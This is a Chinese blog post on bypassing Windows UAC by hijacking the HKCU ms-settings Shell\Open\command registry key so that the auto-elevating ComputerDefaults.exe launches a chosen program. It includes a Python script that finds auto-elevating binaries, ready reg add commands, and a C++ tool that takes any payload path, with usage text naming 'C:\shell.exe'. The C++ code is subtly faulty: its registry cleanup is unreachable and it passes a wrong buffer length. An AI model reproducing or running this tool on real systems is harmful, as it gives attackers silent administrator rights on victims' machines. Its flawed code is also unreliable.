Bypassuac之白名单结合注册表方式

最新推荐文章于 2025-02-27 18:30:18 发布
最新推荐文章于 2025-02-27 18:30:18 发布
阅读量1.1k 收藏 13
点赞数 34
分类专栏: 免杀对抗 文章标签: 安全 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/143466706
版权

参考 Bypass UAC 原来这么简单

本章记录一下系统白名单文件结合注册表bypassuac,uac这个东西并不是Windows设置的防御机制而是相当于保护机制,只是用来控制用户行为的,弹个窗来提醒一下用户的行为,和直接的杀软是不一样的性质,所以uac有多种方式绕过比如系统白名单、DLL 劫持绕过、COM 劫持绕过、利用系统漏洞绕过甚至如果直接提权到高权限也相当于直接绕过了uac

在Windows中普通用户也可以以管理员权限运行程序,在拿到一个普通用户的权限需要执行一些系统操作,比如添加一个用户,运行一个需要管理员权限才能运行的程序等等都会弹出uac控制来提示是否以管理员权限执行,这个时候要么提升权限要么就只能uac绕过。

另外在域中的uac更加严格,需要输入管理员的账号密码才可以继续运行

白名单的挖掘

序需要满足以下几个条件:

1. 程序的manifest标识的配置属性 autoElevate 为 true

2. 程序不弹出UAC弹窗

3. 从注册表里查询Shell\Open\command键值对

       程序的autoElevate如果设置为true就代表他可以直接以管理员权限静默执行,毕竟在Windows系统中不可能每个程序都弹uac吧还是有静默的,条件就这个要设置为true,但是这个被设置为了true不代表一定就不会弹uac!

        第一个条件可以使用微软官方的工具sigcheck64.exe来查找,我们要找一个白名单程序肯定是每个电脑上都会存在的才可以,所以重点寻找系统的那么几个文件比如Windows文件夹

sigcheck64.exe工具使用

一个白程序的 autoElevate 为 true

这里可以使用一个脚本来查找所有白名单(第一次使用会有个要求同意的的gui界面,必须要先运行一遍sigcheck64.exe工具才能使用脚本)

import os
from subprocess import Popen, PIPE

path = 'c:\\windows\\system32'

def GetFileList(path, fileList):
    if os.path.isfile(path):
        if path[-4:].lower() == '.exe':
            fileList.append(path)
    elif os.path.isdir(path):
        try:
            for s in os.listdir(path):
                newDir = os.path.join(path, s)
                GetFileList(newDir, fileList)
        except Exception as e:
            print(e)
    return fileList

files = GetFileList(path, [])
print(files)


for eachFile in files:
    try:
        command = r'.\sigcheck64.exe -m "{}" | findstr auto'.format(eachFile)
        print(command)
        p1 = Popen(command, shell=True, stdout=PIPE)
        output = p1.stdout.read().decode('utf-8')  # 假设输出是utf-8编码
        if '<autoElevate>true</autoElevate>' in output:
            copy_command = r'copy "{}" .\success'.format(eachFile)
            Popen(copy_command, shell=True)
            print('[+] {}'.format(eachFile))
            with open('success.txt', 'a') as f:  # 每次循环都以追加模式打开文件
                f.write('{}\n'.format(eachFile))
    except Exception as e:
        print(e)

# 注意:确保sigcheck64.exe工具在当前目录,并且有权限执行这些命令。

结果保存在success.txt中

下一个条件是程序不弹出UAC弹窗

这里我们就以ComputerDefaults.exe为演示,这个程序是不会弹uac的可以试一试

win +r 直接运行这个程序

发现是没有弹窗符合条件

第三个条件是从注册表里查询Shell\Open\command键值对

注册表操作监控

这里使用ProcessMonitor的Procmon64.exe 工具进行监视程序的行为

这里添加了两条规则一个是ComputerDefaults.exe进程的监视一个是注册表的操作监视

主要是看注册表的操作

运行一下程序所有的注册表操作都监控到了,然后搜索一下我们想要的那个Shell\Open\Command行为是否存在

找到了说明有这个行为,符合条件,这就是我们要的白名单程序

另外可以看到这里有个result是一个 NAME NOT FOUND,这个结果是更好的,说明他去查询的键值对是不存在的可以自己增加修改,如果是success说明以及被写好了,你去修改可能会出其他的问题啥的影响程序运行。

去注册表里看一下 win +r regedit

看HKCU\Software\Classes\ms-settings\Shell\Open\Command 路径是否存在,不存在就手动添加,另外就是HKCU的路径是我们可以修改的,HKUR需要高权限才能修改。一般我们要绕过uac说明我们的权限并不高,如果去查询的路径是在HKUR那就可以换一个程序研究了

查询发现不存在ms-settings的目录

那么我们就创建这些项

这里手动修改这里的值为cmd.exe啥的会被Windows的defender直接拦截。。。

直接修改为calc.exe

但是重新运行ComputerDefaults 并没有弹出计算器,重新查看一下监控

这里将过滤规则中的reg那个删除只保留processname的

可以看到Shell\Open\Command 结果是success说明我们写的成功了,但是后面还有个HKCU\Software\Classes\ms-settings\Shell\Open\Command\DelegateExecute是NAME NOT FOUND 这里也要修改,让这里也通行

那么就是新建一个DelegateExecute字符串

修改后再次打开ComputerDefaults 成功的打开了我们的calc

手动的演示完毕了实际也是可以使用命令或者代码实现的

命令方式

# 添加
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /t REG_SZ /d "calc.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
# 复原
reg delete HKCU\Software\Classes\ms-settings /f

代码生成

#include <iostream>
#include <Windows.h>
#include "tchar.h"

DWORD BypassUAC(LPWSTR filePath){
    PROCESS_INFORMATION pi = { 0 };
    STARTUPINFOA si = { 0 };
    HKEY hKey;
    si.cb = sizeof(STARTUPINFO);
    si.wShowWindow = SW_HIDE;
    DWORD dwDisposition;

    if (filePath == NULL)
    {
        printf("[!] FilePath is null, please try again!\n");
        exit(1);
    }
    else {
        printf("\n");
        printf("[*] Get filePath success , the filePath is : %ws\n", filePath);
    }

    // 创建注册表项
    if (ERROR_SUCCESS != ::RegCreateKeyW(HKEY_CURRENT_USER, L"Software\\Classes\\ms-settings\\Shell\\open\\command", &hKey))
    {
        printf("[!] Create regedit failed, error is : %d\n", GetLastError());
        return FALSE;
    }
    else {
        printf("[*] Create regedit successfully!\n");
    }

    // 设置注册表值
    if (ERROR_SUCCESS != ::RegSetValueExW(hKey, NULL, 0, REG_SZ, (BYTE*)filePath, (::lstrlenW(filePath) + 1024)))
    {
        printf("[!] Create exe_key-value failed, error is : %d\n", GetLastError());
        return FALSE;
    }
    else {
        printf("[*] Create exe_key-value successfully!\n");
    }

    // 设置 DelegateExecute 的值为空
    if (ERROR_SUCCESS != RegSetValueExW(hKey, L"DelegateExecute", 0, REG_SZ, (BYTE*)"", sizeof("")))
    {
        printf("[!] Create delete_key-value failed, error is : %d\n", GetLastError());
        return FALSE;
    }
    else {
        printf("[*] Create delete_key-value successfully!\n");
    }

    // 使用 cmd.exe 来执行 ComputerDefaults.exe
    if (NULL == CreateProcessA("C:\\Windows\\System32\\cmd.exe", (LPSTR)"/c C:\\Windows\\System32\\ComputerDefaults.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
    {
        printf("[!] Create Process failed, error is : %d\n", GetLastError());
        return FALSE;
    }
    else {
        printf("[*] Create Process successfully!\n");
    }

    return TRUE;

    Sleep(3000);

        if (ERROR_SUCCESS != ::RegDeleteTreeW(HKEY_CURRENT_USER, L"Software\\Classes\\ms-settings"))
        {
            printf("[!] Delete regedit failed, error is : %d\n", GetLastError());
        }
        else {
            printf("[*] Delete regedit successfully!\n");
        }
}

int main(int argc, wchar_t* argv[]){
    if (argc != 2)
    {
        printf("UAC.exe <filepath>\n");
        printf("UAC.exe C:\\shell.exe");
    }
    else {
        LPWSTR filePath = argv[1];
        BypassUAC(filePath);
    }

    return 0;
}

不过此程序已近是被Windows监控了,执行cmd.exe啥的估计不行,不过思路是这个思路。

线程知识巩固(六) dispatch_semaphore_t
Erice_e的专栏
06-01 589
一 初识 dispatch_semaphore_t signal //传递的参数是信号量最初值,下面例子的信号量最初值是1 dispatch_semaphore_t signal = dispatch_semaphore_create(1); dispatch_time_t overTime = dispatch_time(DISPATCH_TIME_NOW, 5 * NSEC_PE
【iOS开发】—— GCD
weixin_50990189的博客
03-19 3889
文章目录GCD概述什么是GCD?多线程编程GCD的APIDispatch Queuedispatch_queue_createMain Dispatch Queue/Global Dispatch Queuedispatch_set_target_queuedispatch_after GCD概述 什么是GCD? GCD(Grand Center Dispatch)是异步执行任务的技术之一。开发者定义想执行的任务并且追加到适当的Dispatch Queue中,GCD就能生成必要的线程并计划执行任务。 多线程
iOS开发之GCD信号量dispatch_semaphore_t源码分析和使用
最新发布
hbblzjy的博客
02-27 446
iOS中,信号量对于允许多个线程并发访问的资源,它是一个很好的选择。线程访问资源时,首先获取信号量,即创建信号量,然后等待将信号量的值减1。访问资源之后,线程释放信号量,将信号量的值加1。如果信号量的值大于0,则进程可以继续访问资源,并将信号量的值减1;如果信号量的值等于0,则进程会被阻塞,直到信号量的值变为正数。信号量的值可以是0、1或者n,表示可用资源的数量。‌(2)V(释放)操作‌:当一个进程或线程完成对共享资源的访问时,它会执行V操作,将信号量的值加1。1、信号量的基本概念和作用。
dispatch_semaphore_wait 理解
allanGold
03-27 8405
dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER); /* code */ 对semaphore减一,如果得值小于0(注意是小于0),则等待,如果不小于0,则执行code处代码 所以如果是执行多个任务的话,一般把wait放在dispatch_async的block的第一行,因为会有多个dispatch_async,把d...
奇怪的 dispatch_semaphore_wait
weixin_34007020的博客
07-08 311
2019独角兽企业重金招聘Python工程师标准>>> ...
Dispatch Semaphore
More reading and learning to become excellent
05-09 1163
Dispatch Semaphore 是持有计数的信号量。 dispatch_semaphore_create 创建一个信号量的初始值 传入的参数为long,输出一个dispatch_semaphore_t类型且值为value的信号量。 值得注意的是,这里的传入的参数value必须大于或等于0,否则dispatch_semaphore_create会返回NULL。 dispatch_semaphore_signal => 发送一个信号 这个函数会使传入的信号量dsema的值加1。 返回值为
oc开发-线程的多种实现方式
qq_52041970的博客
07-04 506
实现多线程的三种方式,简洁高效
OC-dispatch-semaphore
03-31
在iOS开发中,`OC-dispatch_semaphore`是一个重要的多线程同步工具,它源自Apple的Grand Central Dispatch(GCD)框架。GCD是Cocoa框架的一部分,为开发者提供了高效的并发编程支持。`dispatch_semaphore`是GCD中的...
OC里的锁
wu347771769的专栏
07-25 936
iOS,OC,锁
重学OC第十九篇:GCD概要及API简介
Rain and Tears
11-05 326
文章目录一、什么是GCD?二、GCD的API1.1三、GCD实现总结 一、什么是GCD? Grand Central Dispatch(GCD)是异步执行任务的技术之一。通常,应用程序中编写的线程管理用的代码要在系统级实现,开发者只需要定义想执行的任务并追加到适当的Dispatch Queue中,GCD就能生成必要的线程并计划执行任务。由于线程管理是作为系统的一部分来实现的,因此可统一管理,也可执行任务,这样就比以前的线程更有效率。 二、GCD的API 1.1 三、GCD实现 总结 ...
[iOS/OC] dispatch_apply性能分析
lq5672的博客
03-21 817
今天对dispatch_apply的性能进行了简单的分析,简单记录下。 dispatch_apply是GCD提供的,可以将迭代器转变为并发任务。 假设我们有一个计算斐波那契数列的算法(这里特意使用了递归):long fibonacci(long x) { if (x <=1) { return 1; } else { return fibonacc
记录dispatch_semaphore_t在ARC中引发的一起crash事故
若梦的专栏
06-19 3955
ALAssetsLibrary *library = [[ALAssetsLibrary alloc] init];           dispatch_semaphore_t sema = dispatch_semaphore_create(0);                   ALAssetsLibraryAssetForURLResultBlock resul
OC高效率52之使用dispatch_once来执行只需运行一次的线程安全代码
weixin_34310127的博客
04-02 333
2019独角兽企业重金招聘Python工程师标准>>> ...
ios--dispatch_semaphore
零纪年的专栏
03-23 744
当我们在处理一系列线程的时候,当数量达到一定量,在以前我们可能会选择使用NSOperationQueue来处理并发控制,但如何在GCD中快速的控制并发呢?答案就是dispatch_semaphore,对经常做unix开发的人来讲,我所介绍的内容可能就显得非常入门级了,信号量在他们的多线程开发中再平常不过了。   信号量是一个整形值并且具有一个初始计数值,并且支持两个操作:信号通知和等待。当一个信
37、iOS底层分析 - 线程锁(七)信号量 dispatch_semaphore
shengdaVolleyball的博客
04-08 1067
大纲 信号量介绍 信号量使用 信号量源码分析 一、信号量 dispatch_semaphore 信号量分析。GCD 的源码 在libdispatch 库中实现的,可以在 Apple Open Source下载 使用: 1、dispatch_semaphore_create(value) 创建信号量,value一般情况下传0 2、dispatch_semaph...
GCD多线程dispatch_semaphore_t的使用
wait_foryou的博客
03-15 334
// 创建一个信号量 dispatch_semaphore_t xl_semaphore = dispatch_semaphore_create(0); dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{#pragma clang diagnostic push #pragma clang
iOS底层探索之多线程(十)—GCD源码分析( 信号量dispatch_semaphore_t)
俊而不逊的博客
08-18 1061
回顾 在上篇博客已经对GCD的栅栏函数做了一个基本介绍,还有应用的举例并且对底层源码进行了分析,本篇博客将对信号量进行探索分析! iOS底层探索之多线程(一)—进程和线程 iOS底层探索之多线程(二)—线程和锁 iOS底层探索之多线程(三)—初识GCD iOS底层探索之多线程(四)—GCD的队列 iOS底层探索之多线程(五)—GCD不同队列源码分析 iOS底层探索之多线程(六)—GCD源码分析(sync 同步函数、async 异步函数) iOS底层探索之多线程(七)—GCD源码分析(锁的原因) iOS底
iOS多线程中的dispatch_semaphore_t semaphoredispatch组和信号量。)
热门推荐
Eduora_meimei的专栏
04-07 1万+
在Windows平台下, 对线程的同步控制,可以有Critical Section,Mutex,Semaphore,Event 等方式.     在IOS平台,使用GCD进行简单的多线程编程时,可以使用dispatch_semaphore_t进行相应的同步操作.      IOS平台上没有对应的Event这个控制对像. 对于一些适合Event模式的情况下,可以通过dispatch_sem
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值